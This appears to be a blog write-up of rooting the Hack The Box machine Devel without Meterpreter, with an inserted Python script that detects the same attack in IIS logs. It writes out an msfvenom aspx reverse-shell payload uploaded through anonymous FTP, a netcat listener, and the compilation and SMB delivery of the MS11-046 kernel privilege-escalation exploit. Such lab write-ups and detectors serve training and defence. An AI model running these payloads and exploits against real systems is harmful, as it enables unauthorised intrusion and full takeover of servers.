Heath Adams challenged his students to become root on HTB Devel without using Meterpreter. I accepted that challenge and succeeded! This is the report of how I did it.
In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).
Create a Connection to the HTB Network
Refer to this post of mine.
Scanning and Enumeration
Open https://www.hackthebox.eu/home/machines and write down Devel’s IPv4 address. Here we can also see that this is a Windows machine.
We first scan the target machine in order to identify open ports and services running behind those ports.
The scan shows that the machine has two open ports:
- FTP (21): We notice that anonymous FTP login is allowed. This tells us that we can upload files to the web server. Moreover, we can see some files here as well; it looks like this is the web root directory.
- HTTP (80): We learn that the http-server-header is Microsoft IIS/7.5. If this were a pentest, this would be a finding, as this is information disclosure. Moreover, we also get to know that the http-title is IIS7. This indicates that we are dealing with a default web page.
The first thing we do in this enumeration is to visit the website at 10.10.10.5.
As our scan suggested, we are dealing with a default web-page. A default web-page indicates poor hygiene. What else did the website developer mess up? We look for extra directories by doing directory busting with DirBuster.
DirBuster does not return anything interesting. The next step is to find out whether files uploaded via FTP are served by the web server on the target. To do this, we first create a text file called test.txt on our Kali machine containing the text “test FTP”. Then we connect to the target via FTP and upload this file. Now we navigate to 10.10.10.5/test.txt in the web browser. Wow! We can see “test FTP” being displayed. This confirms that the FTP directory is the web root: the server read our file and served it.
Exploit Devel with a Windows payload
In this section, our goal is to get a reverse shell through FTP. Firstly, we will create a Windows payload with Msfvenom and save it into an aspx file. Then we will upload this file to the Devel machine via FTP and, after having set up a listener with Netcat, execute it.
We save the Msfvenom payload list into venom-payloads.txt and grep this file for
There are two payloads that are interesting for us:
windows/shell_reverse_tcp. The first is a staged payload, whereas the second is a non-staged payload. The difference between the two is well-explained in this table:
The staged payload did not get me in. For this reason, I will show you how to get a reverse shell by using the non-staged payload.
We create the payload and save it into ex_shell_ns.aspx:
msfvenom -p windows/shell_reverse_tcp LHOST=<Your IPv4 address> LPORT=4444 -f aspx > ex_shell_ns.aspx
We then upload this file to the Devel machine via FTP:
ftp 10.10.10.5
anonymous (this is the username)
anonymous (this is the password)
binary (set the transfer type: binary instead of ASCII)
put ex_shell_ns.aspx (upload the payload into the web root)
We also open a new terminal tab and set up a listener with Netcat, where
-n stands for numeric-only IP addresses,
-v for verbose,
-l for listen mode (wait for inbound connections), and
-p for local port number (in this case, port 4444):
nc -nvlp 4444
Finally, we open 10.10.10.5/ex_shell_ns.aspx in our browser and we get a shell!
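Seen from the defender's side, the whole chain above (anonymous FTP write into the IIS web root, then an HTTP request for the uploaded script) leaves a very recognisable trace in the IIS FTP and web logs. The following is an added example, not code from the original post: it parses W3C-format log records, flags completed STOR commands by the anonymous account for script-executable extensions, and pairs each one with the first HTTP request for the same path inside a time window. The log lines are constructed for this example (field names follow the IIS 7.5 W3C format; IPs, times and paths are made up), and the extension list and one-hour window are assumptions you would tune to your environment.

```python
"""Detect an anonymous FTP upload of a server-side script into the web root
that is then requested over HTTP (the Devel chain), using IIS-style W3C logs.
All sample records below are constructed for this example."""
import os
from datetime import datetime, timedelta

# Assumption: extensions IIS would hand to a script engine or run natively.
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll"}

# Constructed IIS FTP log (W3C format). '***' is how IIS masks the PASS argument.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2020-10-01 10:00:01 10.10.14.2 anonymous 10.10.10.5 21 USER anonymous 331 0
2020-10-01 10:00:01 10.10.14.2 anonymous 10.10.10.5 21 PASS *** 230 0
2020-10-01 10:00:05 10.10.14.2 anonymous 10.10.10.5 21 STOR /test.txt 226 0
2020-10-01 10:02:10 10.10.14.2 anonymous 10.10.10.5 21 STOR /ex_shell_ns.aspx 226 0
2020-10-01 10:05:00 10.10.14.9 deploy 10.10.10.5 21 STOR /release.aspx 226 0
"""

# Constructed IIS web log (W3C format). Real IIS logs replace spaces in the
# User-Agent with '+', so whitespace splitting is safe on the real thing too.
WEB_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-10-01 10:00:09 10.10.10.5 GET /test.txt - 80 - 10.10.14.2 Mozilla/5.0 200
2020-10-01 10:02:30 10.10.10.5 GET /ex_shell_ns.aspx - 80 - 10.10.14.2 Mozilla/5.0 200
2020-10-01 10:30:00 10.10.10.5 GET /release.aspx - 80 - 10.10.14.9 Mozilla/5.0 200
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the '#Fields:' directive.
    Other '#' lines are directives (software, date, ...) and are skipped."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # no header yet, or a malformed record: ignore it
        yield dict(zip(fields, values))


def record_time(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")


def anonymous_script_uploads(ftp_records):
    """Completed (2xx) STOR commands by 'anonymous' whose target has a script extension."""
    hits = []
    for rec in ftp_records:
        if rec["cs-method"] != "STOR" or rec["cs-username"].lower() != "anonymous":
            continue
        if not rec["sc-status"].startswith("2"):
            continue  # transfer was refused or aborted
        ext = os.path.splitext(rec["cs-uri-stem"])[1].lower()
        if ext in SCRIPT_EXTENSIONS:
            hits.append(rec)
    return hits


def correlate(ftp_text, web_text, window=timedelta(hours=1)):
    """One alert per anonymous script upload; 'requested' is True when the same
    path was fetched over HTTP within `window` after the upload (likely execution)."""
    web_records = list(parse_w3c(web_text))
    alerts = []
    for up in anonymous_script_uploads(parse_w3c(ftp_text)):
        t_up = record_time(up)
        alert = {
            "path": up["cs-uri-stem"],
            "uploader_ip": up["c-ip"],
            "uploaded_at": t_up.isoformat(),
            "requested": False,
            "requester_ip": None,
        }
        for req in web_records:
            same_path = req["cs-uri-stem"].lower() == up["cs-uri-stem"].lower()
            if same_path and t_up <= record_time(req) <= t_up + window:
                alert["requested"] = True
                alert["requester_ip"] = req["c-ip"]
                alert["requested_at"] = record_time(req).isoformat()
                break
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in correlate(FTP_LOG, WEB_LOG):
        print(alert)
```

On the constructed logs, test.txt is ignored (not a script extension) and release.aspx is ignored (authenticated user), leaving a single alert for /ex_shell_ns.aspx with requested=True. An upload that is never requested is still worth a lower-severity ticket, since it shows the root cause on its own: an anonymous FTP site that can write into the web root, which is the misconfiguration to fix rather than the symptom to chase.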
Unfortunately, we are not root on this machine yet.
Post-exploit enumeration and Windows privilege-escalation
In this section, our goal is to become root on the target machine. This action is called privilege-escalation, as we have a non-root shell already. Before running this attack, we need to do post-exploit enumeration in order to find a working exploit for this specific machine.
First, we get some information on the target machine.
This is a Windows 7 machine (version 6.1.7600) with x86 architecture. Let’s google “windows 7 (6.1 build 7600) exploit”. Among the results, this exploit is the most interesting: “An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges).” The only prerequisite is “low privilege access to the target OS”. No problem, we have this already. Let’s go ahead and use it.
We download the C source code to our Kali machine, save it as MS11-046.c and compile it as a 32-bit executable with mingw:
i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
Now we have to make MS11-046.exe accessible on the target machine. To do this, we launch an SMB server with Python (Impacket's smbserver.py) on Kali, sharing a directory that holds the executable together with nc.exe:
mkdir smb
cp /usr/share/windows-resources/binaries/nc.exe smb/
mv MS11-046.exe smb/
smbserver.py share smb
Now we go back to our shell on the target and run
We are now the root user on the machine Devel! Now you just have to find the two flags for the users, one of whom is babis. I leave this task as a challenge for you.
I hope you liked this post. If you have any questions, feel free to leave a comment in the comment section. Never stop learning!